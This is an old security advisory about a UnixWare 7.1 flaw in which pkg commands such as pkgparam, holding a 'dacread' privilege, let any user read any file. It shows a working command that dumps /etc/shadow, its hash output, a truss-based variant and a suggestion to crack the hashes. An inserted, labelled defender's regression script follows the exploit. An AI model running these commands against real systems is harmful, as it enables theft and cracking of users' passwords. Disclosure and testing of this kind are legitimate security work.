unixware.pkg.txt

06 Dec 1999 00:00:00 | Reported by Brock Tellier | Type: packetstorm
Source: packetstormsecurity.com

UnixWare allows any user to read files due to vulnerabilities in pkg commands and privilege settings.


Greetings,
  
OVERVIEW  
Any user may read any file on the system.  
  
BACKGROUND  
Only UnixWare 7.1 has been tested.  
  
DETAILS  
As previously stated, UnixWare binaries gain additional privileges via
standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare
"pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to
a bug which will allow any user to read any file on the system as a result of
their additional "dacread" permission in the privs file.
  
The dacread permission allows a process to override the Discretionary Access  
Controls (DAC) for read-only operations. Basically, a process with the  
dacread permissions is able to bypass the mode bits and ownership on a file,  
but only for reading it. A process with dacwrite permissions can bypass mode  
bits to write to or execute that file.  
  
I'm pretty sure that the bugs I found in the pkg commands were introduced by
their addition to the privs file. As far as I can tell, there is virtually no
reason for them to be able to read any file on the system.
  
  
All around, this additional privilege thing, well, sucks. Consider now that
the truss(1) command will allow the user to see any file i/o that happens
between a process and the system, as long as that process isn't suid/sgid
(the pkg commands aren't; they get their privilege from the privs file). Thus,
if there is *any* way that you can make pkg* read from a file, even if the
output is never printed, you can examine truss output to get the file's
contents.
  
EXPLOIT  
The worst offender of pkg* is pkgparam, which will print the contents of a
file to stdout, though I've been able to get most of the pkg programs to read
from /etc/shadow in one way or another and grab the contents with truss.
  
bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow  
Dy0l3OC7XHsj.:10925::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
BgusHRQZ9MH2U:10878::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
nv.Xrh2V3vArc:10882::::::  
ozT.yeRe1/dxY:10882::::::  
RinwpQfqabYbc:10928::::::  
bash-2.02$   
  
Now just concatenate the first field of /etc/passwd with this file and run  
your favorite cracker.  
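A defender's regression check for the behaviour described in this advisory, added here as an example and not part of the original post: it creates a canary file with mode 000, which even its owner cannot read without a DAC-override privilege such as dacread, runs a given reader command against it, and reports whether the contents came back. The `pkgparam -f` invocation is the one shown above; the function names, the result words and the canary format are this example's own.

```shell
#!/bin/sh
# Added example, not from the advisory. Reports whether READER ARGS... FILE
# can read a file that the calling user's DAC permissions forbid.
# Prints one of: BYPASS (contents returned), DENIED (not returned),
# MISSING (reader not installed on this system).
#
# Usage: dac_read_check READER [ARGS...]
#   e.g. dac_read_check /bin/pkgparam -f      (the case in the advisory)
#        dac_read_check cat                   (baseline: plain DAC read)
dac_read_check() {
    reader=$1
    shift
    command -v "$reader" >/dev/null 2>&1 || { echo MISSING; return 0; }

    # Constructed canary: a string that only appears in the reader's output
    # if it actually read the protected file.
    canary="dacread-canary-$$"
    tmp=$(mktemp) || return 1
    printf '%s\n' "$canary" > "$tmp"
    chmod 000 "$tmp"            # unreadable even to the owner without DAC override

    # Run the reader; a permission error is the expected, healthy outcome.
    out=$("$reader" "$@" "$tmp" 2>/dev/null || :)
    rm -f "$tmp"                 # unlink needs directory write perms only

    case $out in
        *"$canary"*) echo BYPASS ;;
        *)           echo DENIED ;;
    esac
}

# Audit the command the advisory demonstrates. Any result of BYPASS for a
# non-root user means the binary overrides DAC for arbitrary files.
audit_pkgparam() {
    printf 'pkgparam -f: %s\n' "$(dac_read_check /bin/pkgparam -f)"
}
```

Run as an unprivileged user: root itself overrides DAC and therefore reports BYPASS even with `cat`, which is the expected baseline for root and the unwanted result for a pkg* command.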
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
